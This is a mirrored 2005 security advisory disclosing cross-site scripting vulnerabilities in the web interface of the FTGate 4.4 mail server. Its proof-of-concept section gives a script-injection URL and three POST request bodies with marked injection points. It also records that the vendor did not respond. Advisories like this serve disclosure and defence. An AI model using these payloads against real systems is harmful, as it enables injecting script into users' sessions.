|
|
|
>>
VUPEN Security / Public Mailing Lists Mirror |
Assigned : VUPEN/ADV-2005-3010
From : Security Advisories <Security-Advisories at acs-inc.com>
Subject : [ACSSEC-2005-11-25-0x3] FTGate 4.4 [Build 4.4.000 Oct 26 2005] Cr oss Site Scripting Vulnerability
Date : 2005-12-20
Original Message
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - XSS Scripting Vulnerability
ID: ACSSEC-2005-11-25 - 0x3
Class: Cross-Site-Scripting (XSS)
Package: FTGate 4.4 [Build 4.4.000 Oct 26 2005]
Build: Windows NT/2k/XP/2k3
Notified: Dec 01, 2005
Released: Dec 20, 2005
Remote: Yes
Severity: Low
Credit: Tim Shelton <security-advisories_at_acs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
-=[ Background
FTGate4 is a powerful Windows(TM) communication suite that combines
exceptional mail handling facilities with comprehensive Groupware
functionality. Its security and collaboration features were developed
in conjunction with leading ISP's and define a new era in mail server
performance.
-=[ Technical Description
FTGate 4.4 [Build 4.4.000 Oct 26 2005] is vulnerable to specially
crafted XSS requests. A remote attacker could trick a user into
viewing a vulnerable page which could then lead to remote compromise.
-=[ Proof of Concepts
http://127.0.0.1:8089/index.fts?href="><script>alert('XSS-magic-string');</s
cript>
POST /domains/index.fts
href=%2Fdomains%2Findex.fts&config=1003&command=0&start=0¶m1=Domain+List
%2C%2Fdomains%2Findex.fts[STRING INJECTION
HERE]¶m2=&find=*&elements=10&aliases=1&data0=19
POST /config/licence.fts
href=%2Fconfig%2Flicence.fts&config=1003&command=0¶m1=Routing%2C%2Ffilte
rs%2Froutes.fts[STRING INJECTION HERE]¶m2=®=
POST /config/systemacl.fts
href=%2Fconfig%2Fsystemacl.fts&config=1003&command=0&id=0¶m1=System+Time
rs%2C%2Fschedules%2Findex.fts[STRING INJECTION
HERE]&redirect=&data1=32&address=
-=[ Solution
No remedy available as of December 2005.
-=[ Credits
Vulnerability originally reported by Tim Shelton
-=[ ChangeLog
2005-11-25 : Original Advisory
2005-12-01 : Notified Vendor
2005-12-20 : No response from vendor, disclosing full information.
Disclaimer : VUPEN Security does not endorse the content of this
message submitted by others to public mailinglists. Messages submitted to public
mailinglists do not necessarily reflect the opinions or policies of VUPEN Security.
VUPEN Security makes no warranties, express or implied, as to the content of the message
in this page or the accuracy and reliability of any messages and other materials
submitted to public mailinglists. Any questions or comments regarding this page
should be sent to
team@vupen.com
|
|
|
|
|
|
Monthly Statistics |
 |
|
|
|
| |
|
Try VUPEN
VNS |
 |
|
 |
|
| |
|
 |
| |
|
|
|
|
